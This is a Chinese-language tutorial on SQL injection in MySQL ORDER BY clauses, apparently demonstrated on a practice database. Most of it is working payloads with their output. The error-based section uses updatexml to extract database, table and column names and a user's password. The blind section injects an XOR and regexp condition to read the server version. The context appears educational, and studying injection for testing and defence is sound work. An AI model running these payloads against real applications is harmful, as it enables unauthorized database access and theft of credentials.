0x01 介绍
顾名思义,注入点出现在oder by后面即可称为order by 注入
正常的oder by 语句:
select * from users order by id desc;
当desc此处位置参数可控时,即有可能存在oreder by注入,那么如何在这样的情况下注出我们想要的数据呢?
1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击
2.如果没有回显,可尝试盲注的手法来注入
0x02通过报错注入(有回显)
这里用updatexml函数来执行报错注入的效果:
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security' //获取当前数据库
获取数据库个数
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
获取数据库列表
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~information_schema'
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'
获取表个数
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~4'
获取表名
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = "security")),0));
ERROR 1105 (HY000): XPATH syntax error: '~emails,referers,uagents,users'
获取字段个数
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select count(*) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~3'
获取字段名
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = "security" and table_name = "users")),0));
ERROR 1105 (HY000): XPATH syntax error: '~id,username,password'
获取信息
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select username from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
mysql> select * from users order by id and (updatexml(1,concat(0x7e,(select password from users limit 0,1)),0));
ERROR 1105 (HY000): XPATH syntax error: '~Dumb'
0x03 通过盲注(没有回显)
另外就是没有order by注入没有回显的情况,这时就该用到盲注了,也就是说采取根据页面回显的状态进行判断的形式来进行布尔盲注。
首先这里运用到了一个异或的知识,0异或任何数值都还是这个值的本身,比如说
0^10010的值还是10010。
接着再来看刚刚的简单sql语句
select * from users order by id desc;
这里的desc是可控字符串的话,我们让这条语句变下形:
select * from users order by id ^0;
这样的话,由于order by默认是升序排列的,没有desc也没有影响,同时,加上了^0也还是id本身,所以跟原来正常的排序没有任何的变化。
select * from users order by id ^1;
但如果是加上了^1的话,就会跟原来的排序发生明显变化,盲注也就通过这里的变化来判断我们注入的sql语句是否返回1。
另外,这里的盲注还用到了regexp,最终的sql注入语句变为:
select * from users order by id ^(select(select version()) regexp '^5');